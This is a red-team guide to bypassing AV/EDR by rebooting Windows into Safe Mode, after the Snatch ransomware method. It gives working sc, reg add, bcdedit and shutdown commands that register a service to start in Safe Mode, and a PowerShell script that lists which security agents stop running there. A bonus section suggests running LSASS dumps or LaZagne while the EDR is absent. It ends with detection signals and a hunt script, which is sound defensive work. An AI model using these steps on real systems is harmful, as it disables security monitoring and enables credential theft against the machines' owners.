Bypass AV/EDR using Safe Mode

Bypass AV/EDR using Safe Mode during your Red Teaming engagements.

Several malware families (Snatch ransomware is the best-known case) reboot the host into Safe Mode, where most AV/EDR agents are not loaded, and register their own service so that it does start there. The malicious code then runs with the security stack absent, which is the evasion this page reproduces.

Safe mode scripts

REM Register the compiled checker as an auto-start service (binary must exist at this path)
sc create CheckSafeMode binpath= "C:\Users\Public\CheckSafeMode.exe" type= own start= auto DisplayName= "CheckSafeMode"
REM A subkey under SafeBoot\Minimal named after the service tells Windows to start it in Safe Mode (Minimal = no networking)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CheckSafeMode"
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CheckSafeMode" /f /v "Service"
REM Make the next boot a Safe Mode boot, then reboot immediately
bcdedit /set {current} safeboot Minimal
shutdown /r /f /t 00

Note that Windows' own entries under SafeBoot\Minimal carry the word Service (or Driver) as the key's default value (reg add ... /ve /d Service /f); the script above writes a named value called Service instead, which is how the referenced repository ships it. Minimal safe mode has no networking, so you lose any remote session until the checker reboots the host again.

Reference: https://github.com/sirpedrotavares/CheckSafeBoot

Step by step

Initially, the scripts (CheckSafeMode.cs, DoIt.bat and undoit.bat) need to be uploaded to the target machine under C:\Users\Public, the path hard-coded in the service's binpath.

In short, CheckSafeMode.cs is the service binary: once started in Safe Mode it identifies the installed AV/EDR products, checks whether they are actually running, writes the result to a file, removes the safeboot option from the BCD and restarts the machine back into normal mode.

Here is how we can compile the CS file with the .NET Framework compiler that ships with Windows (no Visual Studio required); it produces CheckSafeMode.exe in the current directory, which must end up at C:\Users\Public\CheckSafeMode.exe to match the service binpath:

:> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc CheckSafeMode.cs

After compiling the file, we need to run the DoIt.bat file with administrative rights. This script creates the service, adds the registry keys that are essential to run the service in Safe Mode, and sets the BCD safeboot flag so that the next boot is a Safe Mode boot.

As observed above, after adding the registry keys the machine is rebooted. When it comes up in Safe Mode, it runs the exe file we compiled, which checks whether the security tools are running, removes the safeboot option and restarts. It takes about 30 seconds to finish. Be aware that if the exe fails to clear the safeboot flag (for example, bcdedit errors out), the host stays in Safe Mode on every boot until someone removes it by hand, so test this on a lab box before using it on a target.

After it reboots out of safe mode, we can log back in and see the file it created with the output of the exe.

This lets us know which security product is installed and whether it is running in Safe Mode. The results below are for Defender. EDR vendor results are much more interesting, because many sensors simply do not start in Safe Mode.
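The check the compiled binary performs is not shown on this page. The PowerShell below is an added illustration, not the CheckSafeBoot repository's code, of the same idea: confirm that we really booted into Safe Mode, record which security products are installed versus actually running, write a report, and only on request clear the safeboot flag and reboot. It assumes an elevated session on the target; the report path, the service names and the process names are constructed samples chosen here and should be extended with the agents your target runs. Compiled code usually asks GetSystemMetrics(SM_CLEANBOOT) for the boot mode; the script uses the SAFEBOOT_OPTION environment variable, which Windows sets to MINIMAL or NETWORK during a safe boot.

```powershell
# Added example (not from the referenced repository). Run elevated.
param(
    [string]$ReportPath = 'C:\Users\Public\SafeModeReport.txt',  # chosen here, not the tool's path
    [switch]$LeaveSafeModeAndReboot                              # off by default: dry run
)

# 1. Are we in Safe Mode? SAFEBOOT_OPTION exists only during a safe boot.
$bootOption = $env:SAFEBOOT_OPTION
if (-not $bootOption) { $bootOption = 'NORMAL' }

# 2. Products registered with the Security Center. EDR sensors frequently do not
#    register here, so this list is a starting point, not the whole picture.
$scProducts = @()
try {
    $scProducts = Get-CimInstance -Namespace 'root/SecurityCenter2' -ClassName AntiVirusProduct -ErrorAction Stop |
        Select-Object -ExpandProperty displayName
} catch {
    $scProducts = @('<SecurityCenter2 not available on this SKU>')
}

# 3. Constructed sample of service and process names to inspect (Defender/MDE).
$candidateServices  = @('WinDefend', 'Sense', 'WdNisSvc')
$agentProcessHints  = @('MsMpEng', 'MsSense', 'NisSrv')

$lines = @()
$lines += "BootOption=$bootOption Time=$(Get-Date -Format o)"
$lines += 'SecurityCenterProducts=' + ($scProducts -join ';')

foreach ($name in $candidateServices) {
    $svc = Get-Service -Name $name -ErrorAction SilentlyContinue
    if ($null -eq $svc) {
        $lines += "Service=$name Installed=No"
    } else {
        # Installed but Stopped in Safe Mode is exactly the gap this technique abuses.
        $lines += "Service=$name Installed=Yes StartType=$($svc.StartType) Status=$($svc.Status)"
    }
}

foreach ($hint in $agentProcessHints) {
    $running = Get-Process -Name $hint -ErrorAction SilentlyContinue
    $lines += "Process=$hint Running=" + $(if ($running) { 'Yes' } else { 'No' })
}

$lines | Set-Content -Path $ReportPath -Encoding UTF8
$lines | Write-Output

# 4. Leave Safe Mode only when asked, and never reboot if bcdedit failed,
#    otherwise the host would come back in Safe Mode again.
if ($LeaveSafeModeAndReboot) {
    & bcdedit.exe /deletevalue '{current}' safeboot | Out-Null
    if ($LASTEXITCODE -ne 0) {
        throw "bcdedit returned $LASTEXITCODE; safeboot flag still set, not rebooting"
    }
    Restart-Computer -Force
}
```

Run it once in a normal session and once in Safe Mode and diff the two reports: every service that shows Installed=Yes but Status=Stopped in the Safe Mode report is a product that will not see what you do there.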

Removing safe mode service (house cleaning)

Finally, we can run undoit.bat to delete the service we created and remove the SafeBoot\Minimal\CheckSafeMode registry key. Also confirm with bcdedit /enum {current} that no safeboot entry remains, so the host will not drop back into Safe Mode on a later reboot.

Bonus: LSASS dump + LaZagne

Of course, the same service slot can run anything you want or need instead of the checker: an LSASS dump, LaZagne, a BloodHound ingestor and so on, all executed while the EDR is not loaded. Keep in mind that SafeBoot\Minimal boots without networking; tools that must talk to the domain (a BloodHound collector, anything authenticating to a DC) need the Network variant, which means registering the service under SafeBoot\Network and using bcdedit /set {current} safeboot Network instead.

Detection / Defenses

Look for changes (new subkeys or values) under:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot

Useful signals for this are Sysmon Event ID 12/13 (registry key or value set) with a TargetObject under that path, a new service installation (System log Event ID 7045 or Security Event ID 4697) whose image lives outside the Windows and Program Files directories, and a process creation (Security 4688 or Sysmon 1) of bcdedit.exe with "safeboot" on the command line, especially when it is followed by a shutdown /r within seconds.

Consider checking whether your EDR runs in Safe Mode: if the vendor supports it, its service name appears as a subkey under SafeBoot\Minimal and SafeBoot\Network. If it doesn't, check with your vendor to see what they recommend to detect this technique.
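As an added hunt script for the point above (not taken from the page's reference), the PowerShell below walks SafeBoot\Minimal and SafeBoot\Network, resolves each entry that names a service to its ImagePath, flags binaries outside the locations Windows and mainstream security vendors install to, and checks whether the safeboot flag is currently set in the BCD. It assumes an elevated session on the host being examined; the list of trusted path prefixes is a choice made here and should be tuned per estate.

```powershell
# Added hunt example; run elevated on the host under review.

# Chosen here: prefixes considered normal for a service loaded in Safe Mode.
$trustedPrefixes = @(
    "$env:SystemRoot\",
    "$env:ProgramFiles\",
    "${env:ProgramFiles(x86)}\",
    '\SystemRoot\',      # driver-style paths
    'System32\'          # relative driver paths
)

function Get-SafeBootServiceEntries {
    foreach ($mode in 'Minimal', 'Network') {
        $base = "HKLM:\SYSTEM\CurrentControlSet\Control\SafeBoot\$mode"
        foreach ($key in Get-ChildItem -Path $base -ErrorAction SilentlyContinue) {
            $name   = $key.PSChildName
            $svcKey = "HKLM:\SYSTEM\CurrentControlSet\Services\$name"
            $image  = (Get-ItemProperty -Path $svcKey -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
            # Class GUIDs (e.g. disk, USB) and group names such as "Base" have no service key.
            if (-not $image) { continue }

            $expanded = [Environment]::ExpandEnvironmentVariables($image).Trim('"')
            $trusted  = $false
            foreach ($prefix in $trustedPrefixes) {
                if ($expanded.StartsWith($prefix, [StringComparison]::OrdinalIgnoreCase)) { $trusted = $true }
            }

            [pscustomobject]@{
                Mode       = $mode
                Entry      = $name
                ImagePath  = $expanded
                Suspicious = -not $trusted    # e.g. C:\Users\Public\CheckSafeMode.exe
            }
        }
    }
}

function Test-SafeBootFlag {
    # bcdedit prints a line such as "safeboot   Minimal" when the flag is set.
    $out = & bcdedit.exe /enum '{current}' 2>&1
    return [bool]($out | Where-Object { $_ -match '^\s*safeboot\s+' })
}

Get-SafeBootServiceEntries | Sort-Object Suspicious -Descending | Format-Table -AutoSize
"safeboot flag set for next boot: $(Test-SafeBootFlag)"
```

A Suspicious=True row, or a safeboot flag on a machine nobody is troubleshooting, is worth a closer look; the entry name also tells you which service to pull the 7045/4697 installation event for.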
